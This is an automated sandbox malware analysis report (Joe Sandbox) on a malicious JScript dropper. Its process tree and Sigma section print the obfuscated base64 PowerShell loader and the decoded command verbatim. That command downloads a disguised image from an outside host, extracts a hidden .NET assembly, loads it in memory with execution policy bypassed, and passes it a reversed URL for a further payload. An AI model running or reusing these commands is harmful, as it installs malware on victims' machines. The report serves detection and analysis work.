Joe Sandbox Cloud Basic Analysis Report
Edit tour

Windows Analysis Report
15514541_Doc_Sub(C-A0893)10-08-2024.js

Overview

General Information

Sample name:15514541_Doc_Sub(C-A0893)10-08-2024.js
Analysis ID:1491471
MD5:7877c30c23e5a9a156eec6305499f212
SHA1:e50c8c551b7f240ad228cbabf5f65f6f05e02059
SHA256:8ddfd33e477594cd5387654a8b6435e906c692c064ddc55422bb4d2fee08723b
Tags:js
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and load assembly
Yara detected Powershell download and execute
Bypasses PowerShell execution policy
Creates autostart registry keys with suspicious values (likely registry only malware)
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6752 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\15514541_Doc_Sub(C-A0893)10-08-2024.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 5752 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G4? ? ? ? ?bwB0? ? ? ? ?GU? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?v? ? ? ? ?GQ? ? ? ? ?ZQBh? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bu? ? ? ? ?G8? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?agBw? ? ? ? ?Gc? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?TgBl? ? ? ? ?Hc? ? ? ? ?LQBP? ? ? ? ?GI? ? ? ? ?agBl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?TgBl? ? ? ? ?HQ? ? ? ? ?LgBX? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C4? ? ? ? ?R? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?EQ? ? ? ? ?YQB0? ? ? ? ?GE? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBV? ? ? ? ?HI? ? ? ? ?b? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EU? ? ? ? ?bgBj? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?Bp? ? ? ? ?G4? ? ? ? ?ZwBd? ? ? ? ?Do? ? ? ? ?OgBV? ? ? ? ?FQ? ? ? ? ?Rg? ? ? ? ?4? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBT? ? ? ? ?FQ? ? ? ? ?QQBS? ? ? ? ?FQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBF? ? ? ? ?E4? ? ? ? ?R? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?E8? ? ? ? ?Zg? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?TwBm? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?t? ? ? ? ?Gc? ? ? ? ?ZQ? ? ? ? ?g? ? ? ? ?D? ? ? ? ?? ? ? ? ?I? ? ? ? ?? ? ? ? ?t? ? ? ? ?GE? ? ? ? ?bgBk? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?t? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?Cs? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?LgBM? ? ? ? ?GU? ? ? ? ?bgBn? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?t? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bi? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BD? ? ? ? ?G8? ? ? ? ?bQBt? ? ? ? ?GE? ? ? ? ?bgBk? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBT? ? ? ? ?HU? ? ? ? ?YgBz? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?s? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bi? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BM? ? ? ? ?GU? ? ? ? ?bgBn? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bj? ? ? ? ?G8? ? ? ? ?bQBt? ? ? ? ?GE? ? ? ? ?bgBk? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?QwBv? ? ? ? ?G4? ? ? ? ?dgBl? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?Bd? ? ? ? ?Do? ? ? ? ?OgBG? ? ? ? ?HI? ? ? ? ?bwBt? ? ? ? ?EI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bi? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BD? ? ? ? ?G8? ? ? ? ?bQBt? ? ? ? ?GE? ? ? ? ?bgBk? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?ZQBk? ? ? ? ?EE? ? ? ? ?cwBz? ? ? ? ?GU? ? ? ? ?bQBi? ? ? ? ?Gw? ? ? ? ?eQ? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?UgBl? ? ? ? ?GY? ? ? ? ?b? ? ? ? ?Bl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?G8? ? ? ? ?bg? ? ? ? ?u? ? ? ? ?EE? ? ? ? ?cwBz? ? ? ? ?GU? ? ? ? ?bQBi? ? ? ? ?Gw? ? ? ? ?eQBd? ? ? ? ?Do? ? ? ? ?OgBM? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bj? ? ? ? ?G8? ? ? ? ?bQBt? ? ? ? ?GE? ? ? ? ?bgBk? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B0? ? ? ? ?Hk? ? ? ? ?c? ? ? ? ?Bl? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GQ? ? ? ? ?QQBz? ? ? ? ?HM? ? ? ? ?ZQBt? ? ? ? ?GI? ? ? ? ?b? ? ? ? ?B5? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?V? ? ? ? ?B5? ? ? ? ?H? ? ? ? ?? ? ? ? ?ZQ? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?Z? ? ? ? ?Bu? ? ? ? ?Gw? ? ? ? ?aQBi? ? ? ? ?C4? ? ? ? ?SQBP? ? ? ? ?C4? ? ? ? ?S? ? ? ? ?Bv? ? ? ? ?G0? ? ? ? ?ZQ? ? ? ? ?n? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?G0? ? ? ? ?ZQB0? ? ? ? ?Gg? ? ? ? ?bwBk? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?d? ? ? ? ?B5? ? ? ? ?H? ? ? ? ?? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?E0? ? ? ? ?ZQB0? ? ? ? ?Gg? ? ? ? ?bwBk? ? ? ? ?Cg? ? ? ? ?JwBW? ? ? ? ?EE? ? ? ? ?SQ? ? ? ? ?n? ? ? ? ?Ck? ? ? ? ?LgBJ? ? ? ? ?G4? ? ? ? ?dgBv? ? ? ? ?Gs? ? ? ? ?ZQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?bgB1? ? ? ? ?Gw? ? ? ? ?b? ? ? ? ?? ? ? ? ?s? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBv? ? ? ? ?GI? ? ? ? ?agBl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?Bb? ? ? ? ?F0? ? ? ? ?XQ? ? ? ? ?g? ? ? ? ?Cg? ? ? ? ?JwB0? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Hk? ? ? ? ?awBz? ? ? ? ?C8? ? ? ? ?bgBp? ? ? ? ?G0? ? ? ? ?Z? ? ? ? ?Bh? ? ? ? ?C0? ? ? ? ?c? ? ? ? ?B3? ? ? ? ?C8? ? ? ? ?ZQBn? ? ? ? ?C4? ? ? ? ?bwBz? ? ? ? ?GE? ? ? ? ?bQ? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?OgBz? ? ? ? ?H? ? ? ? ?? ? ? ? ?d? ? ? ? ?B0? ? ? ? ?Gg? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?DE? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?EM? ? ? ? ?OgBc? ? ? ? ?F? ? ? ? ?? ? ? ? ?cgBv? ? ? ? ?Gc? ? ? ? ?cgBh? ? ? ? ?G0? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQBc? ? ? ? ?Cc? ? ? ? ?I? ? ? ? ?? ? ? ? ?s? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBu? ? ? ? ?GU? ? ? ? ?dQBy? ? ? ? ?G8? ? ? ? ?bQBv? ? ? ? ?Cc? ? ? ? ?L? ? ? ? ?? ? ? ? ?n? ? ? ? ?EE? ? ? ? ?Z? ? ? ? ?Bk? ? ? ? ?Ek? ? ? ? ?bgBQ? ? ? ? ?HI? ? ? ? ?bwBj? ? ? ? ?GU? ? ? ? ?cwBz? ? ? ? ?DM? ? ? ? ?Mg? ? ? ? ?n? ? ? ? ?Cw? ? ? ? ?JwBk? ? ? ? ?GU? ? ? ? ?cwBh? ? ? ? ?HQ? ? ? ? ?aQB2? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Cc? ? ? ? ?KQ? ? ? ? ?p? ? ? ? ?? ? ? ? ?==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6800 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yks/nimda-pw/eg.osam//:sptth' , '1' , 'C:\ProgramData\' , 'neuromo','AddInProcess32','desativado'))" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 5548 cmdline: "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\neuromo.js" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 5752JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    Process Memory Space: powershell.exe PID: 5752INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0x44cb3:$b2: ::FromBase64String(
    • 0xf5ae3:$b2: ::FromBase64String(
    • 0xf6249:$b2: ::FromBase64String(
    • 0xf7186:$b2: ::FromBase64String(
    • 0xf75ec:$b2: ::FromBase64String(
    • 0xf7b7a:$b2: ::FromBase64String(
    • 0xf7f97:$b2: ::FromBase64String(
    • 0x44b27:$b3: ::UTF8.GetString(
    • 0xf5957:$b3: ::UTF8.GetString(
    • 0xf60bd:$b3: ::UTF8.GetString(
    • 0xf6ffa:$b3: ::UTF8.GetString(
    • 0xf7460:$b3: ::UTF8.GetString(
    • 0xf79ee:$b3: ::UTF8.GetString(
    • 0xf7e0b:$b3: ::UTF8.GetString(
    • 0x3b8e4:$s1: -join
    • 0xfb62d:$s1: -join
    • 0x8868a:$s3: reverse
    • 0x8f2c9:$s3: reverse
    • 0x91310:$s3: reverse
    • 0x9c33f:$s3: reverse
    • 0xa158c:$s3: reverse
    Process Memory Space: powershell.exe PID: 6800JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      Process Memory Space: powershell.exe PID: 6800INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0x3c760:$b2: ::FromBase64String(
      • 0x3cd03:$b2: ::FromBase64String(
      • 0xf3843:$b2: ::FromBase64String(
      • 0xf3c55:$b2: ::FromBase64String(
      • 0xf4d0e:$b2: ::FromBase64String(
      • 0x1b9c6a:$b2: ::FromBase64String(
      • 0x6d0171:$b2: ::FromBase64String(
      • 0x83c880:$b2: ::FromBase64String(
      • 0x83cc1f:$b2: ::FromBase64String(
      • 0x83d95f:$b2: ::FromBase64String(
      • 0x842413:$b2: ::FromBase64String(
      • 0x842825:$b2: ::FromBase64String(
      • 0x846a08:$b2: ::FromBase64String(
      • 0x846e22:$b2: ::FromBase64String(
      • 0x84743e:$b2: ::FromBase64String(
      • 0x847a12:$b2: ::FromBase64String(
      • 0x847dcb:$b2: ::FromBase64String(
      • 0x85d666:$b2: ::FromBase64String(
      • 0x85da78:$b2: ::FromBase64String(
      • 0x8cfa22:$b2: ::FromBase64String(
      • 0x8d7d24:$b2: ::FromBase64String(

      Other

      SourceRuleDescriptionAuthorStrings
      amsi64_6800.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

        Sigma Signatures

        System Summary

        barindex
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G4? ? ? ? ?bwB0? ? ? ? ?GU? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?v? ? ? ? ?GQ? ? ? ? ?ZQBh? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bu? ? ? ? ?G8? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?agBw? ? ? ? ?Gc? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?TgBl? ? ? ? ?Hc? ? ? ? ?LQBP? ? ? ? ?GI? ? ? ? ?agBl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?TgBl? ? ? ? ?HQ? ? ? ? ?LgBX? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C4? ? ? ? ?R? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?EQ? ? ? ? ?YQB0? ? ? ? ?GE? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBV? ? ? ? ?HI? ? ? ? ?b? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? 